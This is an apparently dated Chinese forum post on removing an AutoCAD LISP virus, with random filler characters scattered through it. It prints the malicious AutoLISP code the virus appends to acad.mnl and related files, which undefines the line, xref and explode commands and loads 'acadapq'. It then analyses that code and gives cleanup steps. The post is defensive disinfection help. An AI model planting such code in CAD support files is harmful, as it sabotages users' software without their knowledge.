. P% R @/ ^$ g! |8 P# f
6 J& [) ~" T8 g$ Y8 f D" d) `, F
最新AUTOCAD病毒清除办法
$ d7 `1 j3 F1 u7 A5 |" A7 g方法一: # V% ~# G% u2 b* t* m& W
无法画直线|cad操作很慢|无法使用炸开命令|直线
- j% E. R% r- G( g2 ], \; ], j, F最近电脑中了AUTOCAD病毒了,上网查了一下解决办法,结果一个都不起作用,然后自己寻思解决方法,终于在一个错误的时间错误的地点我发现了病毒代码的老巢,随后将其清除出去。下面讲一下我的抗毒过程,希望对各位有所帮助。不足之处请多指教。
, D" ^6 b. b) K5 U) w. C首先描述一下病毒特征:打开AUTOCAD2008以后速度很慢,在命令里面会出现以下提示: 7 M& U& ?7 ?. `, j' J2 t
加载自定义文件成功。自定义组: ACAD ' k7 x& h. N. x U7 C
加载自定义文件成功。自定义组: CUSTOM
! z1 d$ ^3 t9 ], k' k正在重生成模型。 + F3 w' ~% u% m
; 错误: LOAD 失败: "acadapq"
* s; Z/ s- O) H9 v! EAutoCAD 菜单实用程序已加载。; 错误: LOAD 失败: "acadapq"
7 \: V9 |" {4 O/ ` c: s# P9 s; 错误: LOAD 失败: "acadapq"
/ h4 W8 `! j) ?) \; 错误: LOAD 失败: "acadapq"
" |+ y# Q6 r) X& y$ s1 L) ^命令: COMMANDLINE 0 N' R5 Z0 B0 y1 k7 {6 B
上述提示结束后,接着是直线命令无法使用,不能在一个窗口中打开多个CAD文件(每打开一个CAD文件就会出现一个窗口,很耗系统资源) " L! H+ T* I/ s$ C
下面讲讲如何清除病毒代码,首先打开C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 2008\R17.1\chs\Support文件夹,找到acad.mnl,AecArchXOE.mnl,acetmain.mnl这个三个文件。
/ w z3 h- l6 @# O8 S以上三个文件中毒之后,会在以上各自文件代码的后面植入一段病毒代码,代码如下:
, j/ } | w! H3 ]! f/ Z& I4 M* B% q$ ~* D5 H
从代码(setvar "sdi" 1) ; ?; x$ k+ j9 A9 L+ F W
(setvar "ACADLSPASDOC" 1) 4 g) U+ m5 d T9 q! @
(command "undefine" "line")
% l, |$ X1 h+ L# \1 G1 [6 `3 I(command "undefine" "_line") # m$ z4 N" E% u1 l5 b1 ?, r: ~4 \9 m
(command "undefine" "xref") 9 I9 y1 N! ?+ N
(command "undefine" "_xref")
5 ^, z/ ~# H6 B' @: r) S8 B4 A8 ](command "undefine" "explode") " T0 ~, A; |/ B2 c
(command "undefine" "_explode")
/ q {7 i+ D4 H; r(setvar "cmdecho" 1) 6 D" ~+ F. K+ k
(load "acadapq")
7 E- Q* E' v( P. u0 l6 ]" S5 O中可以看出,病毒将SDI的默认值有0改为了1,所以就不能够在同一个窗口中打开多个CAD文件了。其中执行了command "undefine" "line"这段代码禁用了直线(line)命令,所我们无法使用直线工具,在病毒运行的情况下,在命令行里面输入redefine这个命令,然后输入line就可以恢复使用直线工具了。 . O! r' }2 O7 ~+ w6 V' I. k5 @
上面对病毒代码分析了一下,后面的工作就简单了,只要把病毒代码从这三个文件中删除,然后保存文件,将文件属性改为只读。到此为止病毒清理工作完毕。打开CAD速度很快的。病毒清理之后出现了一个新的问题,打开CAD的时候会出现以下命令提示: e! V( L6 f* }- M8 i" J
; 错误: 参数类型错误: streamp nil
% b0 l0 x9 I6 Y7 F9 T; 错误: 参数类型错误: streamp nil
, z7 t: F; w6 g" q ~% ~' F$ a命令: COMMANDLINE
5 L+ f; z) O+ [0 B8 ], B这个问题目前未能解决,但是该问题不会对CAD使用产生影响(到目前为止)。 4 I% ?6 ]- {1 R/ g9 N: x# I
本文以autocad2008为例,其他版本没有测试,各位不妨一试。
* Z+ d- {& z7 I( p" r* ?- H* |第二种方法
- D2 W" c5 l2 z% W4 U% Z特征为:自动生成acad.lsp ,acaddoc.lsp ,acadap.lsp,acad.fas,acad.mnl,acad.sys,lcm.fas,cad.fas,acad.ini等文件;在某时间出现“党不会亏待你……”“成功完成复制!……”;无法使用炸开、直线命令,鼠标中键不为缩放等等。 其特点均为lisp编写,由于打开图纸文件时,CAD会自动将病毒文件加载并运行,所以造成一定程度的危害。 还有一个基于dwwin.exe或dwgrun.exe的病毒,特征是出现winfas.in,dwgrun.bat文件等,其实也是依靠.lsp文件来感染的,但传播方式是依靠.exe文件,根据这个病毒特征来看,是病毒作者为实现目的硬生生拼凑的,中这个病毒只能说您安装的杀毒软件实在太差或者设置不合理。此病毒直接通过下述方法无法彻底清除,请先安装杀毒和防御软件,如卡巴,微点等(瑞星就免了吧),再利用下述方法解决。 ------------------------------特点说明------------------------------------------------- 通俗地解释其特点: 1.病毒不破坏DWG图纸文件,电脑中的图纸DWG文件照常可以使用。 2.病毒破坏CAD软件的配置,最好重新安装CAD。 3.部分病毒有改写同类文件的特点,只要中毒,所有.lsp .mnl等文件逐渐均被改写,此类病毒危害最大。 ------------------------------杀毒方法------------------------------------------------- 通用杀毒方法: 将硬盘、u盘、移动硬盘、网络共享文件夹中的.fas .lsp .mnl .arx等类型文件全部删除即可。 具体方法如下: 1.关闭CAD。 2.卸载CAD,然后删除CAD所在文件夹。 3.打开“我的电脑”--->点“搜索”(或者按CTRL+F)
2 u" p/ S- Z) ~& |$ h' G --->"要搜索的文件或文件夹名”里输入 *.fas *.lsp *.mnl *.arx' R5 Y0 l' L* Y0 }: I( V
--->点“立即搜索”。 4.将搜索到的所有文件全部删除。同理方法,搜索自己的U盘,移动硬盘,网络文件夹等。 5.注意图纸压缩包内是否有此类文件。同上方法搜索 *.RAR *.ZIP 看你打包的图纸文件内是否包有上述类型文件,有就删除。 6.重新安装AutoCAD和其平台上辅助软件即可。 第三种方法:
, b" i( M, x- A k最为简单方便,将cad软件卸载 : @ M' z8 {4 b, b [- F
使用金山毒霸软件升级到最新版本以后,全盘杀毒 / d" l% R6 [8 S# d+ A+ B3 w
再重新安装使用
9 o0 C- n- H1 p5 s" _+ j B& ]6 H% A7 P* }7 i7 m* D. d* k
7 p4 ]+ m4 ?" S
直线命令无法使用时的简单处理方法:
8 A* ?! U/ k3 A; `9 G9 r在病毒运行的情况下,在命令行里面输入redefine这个命令,然后输入line就可以恢复使用直线工具了。
6 `; N" g# U" d2 b( l6 d3 f | 
发表于 2009-12-1 08:28:52
发表于 2012-8-10 21:47:08
发表于 2012-8-10 22:35:55